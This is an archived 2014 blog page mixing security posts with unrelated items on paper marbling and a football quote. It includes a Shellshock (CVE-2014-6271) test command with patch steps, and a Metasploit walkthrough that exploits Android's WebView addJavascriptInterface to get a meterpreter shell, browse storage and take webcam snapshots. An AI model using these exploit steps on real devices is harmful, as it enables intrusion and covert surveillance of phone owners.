Archive | September, 2014

Testing Shellshock Bug In BASH – CVE-2014-6271 (Exploit 1)

To test for the vulnerability on your *nix systems just issue the following command as any user (doesn’t have to be root):

env testbug='() { :;}; echo VULNERABLE' bash -c "echo completed"

If you see this:

VULNERABLE
completed

It’s vulnerable, if it’s fixed or not vulnerable you should see this:

bash: warning: testbug: ignoring function definition attempt
bash: error importing function definition for `testbug'
completed

Leave a Comment
Video

Paper Marbling

This must be the least stressful work in the world, seems so satisfying and relaxing. The song is “Charlotte Mittnacht” by DeVotchka.

CVE-2014-6271: remote code execution through bash, time to patch!

“Stephane Chazelas discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name.”

In many common configurations, this vulnerability is exploitable over the network.

This vulnerability is actually really bad and you want to patch any Internet-facing systems ASAP! It allows remote, unauthenticated attackers to run code on vulnerable systems. It scores a 10 on the NVD severity scale: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

The good news is that it’s an easy fix:

Debian (Ubuntu, etc.):

sudo apt-get update
sudo apt-get upgrade bash

RHEL (Fedora, CentOS, etc.):

sudo yum update bash

 

Please refer to your operating system vendor’s instructions, for example:

 

via: http://seclists.org/oss-sec/2014/q3/649

Leave a Comment
Video

Exploit Android via WebView addJavascriptInterface Code Execution

“What I am going to show you today is that this phone is nominally not vulnerable … can become vulnerable quite easily just downloading fairly popular Apps form Google Play Store” said Tod Beardsley – Pirate Captain for Metasploit Framework, Rapid7. The sound advice of never side loading Apps and always going through the Play Store because its ‘safe’ is not always true, case in point:

msfconsole
use exploit/android/browser/webview_addjavascriptinterface
info
show options
set LHOST <ip address>
exploit

By downloading an aftermarket browser from the Google Play Store [in the video the App is called “Marathon Browser”] and viewing a specifically crafted web page the phone could be hacked and give up a meterpreter session. “Effectively this browser is a backdoor into my phone” explained Beardsley. The situation is critical, nearly 70 percent of Android based handsets are vulnerable because they run Android versions prior to 4.2.

sessions -i
sessions -i 1
ls 
cd /sdcard

While you only have the permissions of the browser you still have the ability to do a lot with the current user rights of the browser, even using the camera.

webcam_list
webcam_snap 1


“This module exploits a privilege escalation issue in Android < 4.2’s WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView’s HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup).”
source: http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface

Image

Richard Sherman Press Conference Quote and Study Habits – Student of the Game

NFC Championship - San Francisco 49ers v Seattle Seahawks
Postgame Interview quote from Richard Sherman – Jan. 22, 2014 Press Conference after Seahawks won against the 49ers – NFC Championship Game

Whatever beginnings you come from just understand that your circumstances don’t dictate your future. Your circumstances don’t control your limits. You’re limitless, you’re a limitless person, you’re limitless by your faith, your abilities, your trust in yourself, your hard work, you can do as much as you want to do … but to not go out there and work as hard as you can and give yourself the best possible chance to be successful you’re doing yourself a disservice.

Whether it’s Football or any other activity, it takes discipline… You need to be a ‘student of the game’[1]; whatever your game is! Tape study most likely helped Sherman and the Seahawks Defense crack Peyton Manning’s Hand Signals[2] giving them the ‘best possible chance’ during the 2014 Super Bowl XLVIII.

[1] VIDEO: Richard Sherman – Student of the Game
[2] http://www.businessinsider.com/seahawks-peyton-manning-hand-signals-2014-2

 

via: http://www.sportsradiokjr.com/articles/the-latest-430702/richard-sherman-press-conference-quotes-jan-11999992/